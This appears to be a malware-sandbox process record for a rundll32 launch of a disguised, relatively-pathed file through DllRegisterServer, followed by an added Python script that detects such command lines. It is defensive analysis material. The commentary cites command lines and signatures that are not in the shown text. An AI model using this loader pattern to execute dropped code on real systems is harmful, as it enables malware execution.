                                                                                                                                                Start time:14:26:04
                                                                                                                                                Start date:23/02/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:rundll32 ..\JDFR.hdfgr4,DllRegisterServer
                                                                                                                                                Imagebase:0x1310000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
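The rundll32 command lines recorded above share three traits that rarely appear together in legitimate use: the module is given by a relative path (`..\`), it does not carry a DLL-style extension (rundll32 loads any PE image regardless of its name), and the export invoked is DllRegisterServer, which takes no arguments and so is a convenient way to run a dropped DLL's code. The following Python is an added example, not part of the sandbox report, that turns those observations into a command-line triage check; the two benign command lines it is exercised against are constructed for the example, and the two-indicator threshold is an assumption chosen to keep ordinary COM registration out of the results.

```python
import ntpath
import re
from dataclasses import dataclass, field

# "rundll32[.exe] <module>,<export> [args]"; the image may be quoted or carry a full path.
RUNDLL32_RE = re.compile(
    r'^"?(?:[^"\s]*[\\/])?rundll32(?:\.exe)?"?\s+'
    r'(?P<module>"[^"]*"|[^\s,]+)\s*,\s*(?P<export>\w+)',
    re.IGNORECASE,
)

# Extensions legitimate callers normally hand to rundll32.
NORMAL_MODULE_EXTS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}


@dataclass
class Verdict:
    cmdline: str
    module: str = ""
    export: str = ""
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Any single indicator has benign uses; two together rarely do (assumed threshold).
        return len(self.reasons) >= 2


def analyze_rundll32(cmdline: str):
    """Return a Verdict for a rundll32 command line, or None if it is not one."""
    m = RUNDLL32_RE.match(cmdline.strip())
    if m is None:
        return None
    module = m.group("module").strip('"')
    export = m.group("export")
    v = Verdict(cmdline=cmdline, module=module, export=export)

    # ntpath handles backslash paths correctly even when this runs on a non-Windows host.
    ext = ntpath.splitext(module)[1].lower()
    if ext not in NORMAL_MODULE_EXTS:
        v.reasons.append(
            f"module extension {ext!r} is not a DLL-style extension; "
            "rundll32 loads any PE image regardless of its name"
        )

    # A relative path with a separator is resolved against the current working
    # directory, which for an Office child process is typically the document's folder.
    has_sep = "\\" in module or "/" in module
    if has_sep and not ntpath.isabs(module):
        v.reasons.append("module given as a relative path, resolved from the current working directory")

    if export.lower() == "dllregisterserver":
        v.reasons.append("DllRegisterServer takes no arguments, a convenient entry point to run arbitrary DLL code")
    return v


def triage(cmdlines):
    """Return the suspicious Verdicts among a list of command lines."""
    hits = []
    for c in cmdlines:
        v = analyze_rundll32(c)
        if v is not None and v.suspicious:
            hits.append(v)
    return hits


# Sample input: the three command lines from the report above, plus two constructed benign ones.
SAMPLE_CMDLINES = [
    r"rundll32 ..\JDFR.hdfgr2,DllRegisterServer",
    r"rundll32 ..\JDFR.hdfgr3,DllRegisterServer",
    r"rundll32 ..\JDFR.hdfgr4,DllRegisterServer",
    r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl",  # constructed, benign
    r'rundll32.exe "C:\Program Files\Vendor\helper.dll",DllRegisterServer',  # constructed, benign COM registration
]

if __name__ == "__main__":
    for v in triage(SAMPLE_CMDLINES):
        print(v.cmdline)
        for r in v.reasons:
            print("   -", r)
```

Run against the sample list, only the three report command lines come back, each with all three reasons; the constructed COM registration of a fully-qualified `.dll` trips only the DllRegisterServer indicator and stays below the threshold. In a real pipeline the parent image (an Office process) would be an additional, stronger indicator, as the Sigma rule named in the report's signature list already captures.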

Disassembly

Code Analysis